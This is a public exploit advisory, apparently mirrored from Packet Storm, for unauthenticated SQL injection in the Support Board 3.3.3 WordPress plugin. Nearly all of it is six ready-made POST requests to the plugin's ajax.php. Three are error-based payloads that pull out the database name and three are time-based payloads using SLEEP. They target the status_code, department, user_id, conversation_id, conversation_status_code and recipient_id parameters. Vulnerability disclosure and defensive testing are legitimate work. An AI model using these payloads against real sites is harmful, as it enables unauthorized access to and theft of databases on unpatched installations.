Share
## https://sploitus.com/exploit?id=PACKETSTORM:164167
# Exploit Title: Support Board 3.3.3 - 'Multiple' SQL Injection (Unauthenticated)  
# Date: 29.08.2021  
# Exploit Author: John Jefferson Li <yiyohwi@naver.com>  
# Vendor Homepage: https://board.support/  
# Software Link: https://codecanyon.net/item/support-board-help-desk-and-chat/20359943  
# Version: 3.3.3  
# Tested on: Ubuntu 20.04.2 LTS  
  
----- PoC 1: Error Based SQLi (status_code) -----  
  
Request   
  
POST /wp-content/plugins/supportboard/supportboard/include/ajax.php HTTP/1.1  
Vulnerable Parameter: status_code (POST)  
  
function=new-conversation&status_code=2"+AND+EXTRACTVALUE(4597,CONCAT("","DB+Name:+",(SELECT+(ELT(4597=4597,""))),database()))+AND+"fKoo"="fKoo&title=&department=&agent_id=&routing=false&login-cookie=&user_id=46&language=false  
  
  
----- PoC 2: Error Based SQLi (department)-----  
  
Request   
  
POST /wp-content/plugins/supportboard/supportboard/include/ajax.php HTTP/1.1  
Vulnerable Parameter: department (POST)  
  
function=new-conversation&status_code=2o&title=&department=(UPDATEXML(5632,CONCAT(0x2e,"Database+Name:+",(SELECT+(ELT(5632=5632,""))),database()),3004))&agent_id=&routing=false&login-cookie=&user_id=46&language=false  
  
  
----- PoC 3: Error Based SQLi (user_id) -----  
  
Request   
  
POST /wp-content/plugins/supportboard/supportboard/include/ajax.php HTTP/1.1  
Vulnerable Parameter: user_id (POST)  
  
function=send-message&user_id=-5"+AND+GTID_SUBSET(CONCAT("Database+Name:+",(SELECT+(ELT(3919=3919,""))),database()),3919)+AND+"wrOJ"="wrOJ&conversation_id=35&message=TEST+POC&conversation_status_code=false&queue=false&payload=false&recipient_id=false&login-cookie=&language=false  
  
  
----- PoC 4: Time Based SQLi (conversation_id)-----  
  
Request  
  
POST /wp-content/plugins/supportboard/supportboard/include/ajax.php HTTP/1.1  
Vulnerable Parameter: conversation_id (POST)  
  
function=send-message&user_id=5&conversation_id=45"+AND+(SELECT 1479+FROM+(SELECT(SLEEP(5)))xttx)--+BOXv&message=test+&conversation_status_code=false&queue=false&payload=false&recipient_id=false&login-cookie=&language=false  
  
  
----- PoC 5: Time Based SQLi (conversation_status_code)-----  
  
Request  
  
POST /wp-content/plugins/supportboard/supportboard/include/ajax.php HTTP/1.1  
Vulnerable Parameter: conversation_status_code (POST)  
  
function=send-message&user_id=5&conversation_id=45&message=test+&conversation_status_code=false+WHERE+9793=9793+AND+(SELECT+4500+FROM+(SELECT(SLEEP(5)))oJCl)--+uAGp&queue=false&payload=false&recipient_id=false&login-cookie=&language=false  
  
  
----- PoC 6: Time Based SQLi (recipient_id)-----  
  
Request  
  
POST /wp-content/plugins/supportboard/supportboard/include/ajax.php HTTP/1.1  
Vulnerable Parameter: recipient_id (POST)  
  
function=send-message&user_id=5&conversation_id=45&message=test+&conversation_status_code=false&queue=false&payload=false&recipient_id=false+AND+(SELECT+7416+FROM+(SELECT(SLEEP(5)))eBhm)&login-cookie=&language=false